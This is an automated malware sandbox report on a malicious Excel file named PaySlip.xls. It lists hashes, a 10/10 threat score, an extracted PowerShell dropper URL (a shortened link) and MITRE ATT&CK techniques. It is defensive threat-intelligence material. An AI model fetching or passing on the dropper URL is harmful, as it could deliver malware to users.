General

  • Target

    PaySlip.xls

  • Size

    157KB

  • Sample

    210119-8ygpqxqywj

  • MD5

    3202c4586c4991c9f5312238f7577d8e

  • SHA1

    10291ff94dbce8eda7aa9ede69bf984a084b8b9e

  • SHA256

    3f97ea67ea560c851c589e4b7161f60ece5c390a9e194818b30987b212434c06

  • SHA512

    ebe2a28ac003935a61b9795b39aa34324d275aed8340263d9566b6068cbe813e979f28b6243d9115bbd2d23988a161129675aaa33281b855399b15ffb4aa1691

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cutt.ly/fjYtydH

Targets

    • Target

      PaySlip.xls

    • Size

      157KB

    • MD5

      3202c4586c4991c9f5312238f7577d8e

    • SHA1

      10291ff94dbce8eda7aa9ede69bf984a084b8b9e

    • SHA256

      3f97ea67ea560c851c589e4b7161f60ece5c390a9e194818b30987b212434c06

    • SHA512

      ebe2a28ac003935a61b9795b39aa34324d275aed8340263d9566b6068cbe813e979f28b6243d9115bbd2d23988a161129675aaa33281b855399b15ffb4aa1691

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Tasks